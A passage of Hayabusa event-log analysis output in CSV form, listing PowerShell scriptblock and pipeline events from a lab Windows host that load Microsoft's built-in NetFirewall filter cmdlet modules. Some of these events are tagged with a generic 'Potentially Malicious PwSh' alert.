($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.300 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.301 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.302 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.302 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.340 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.370 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 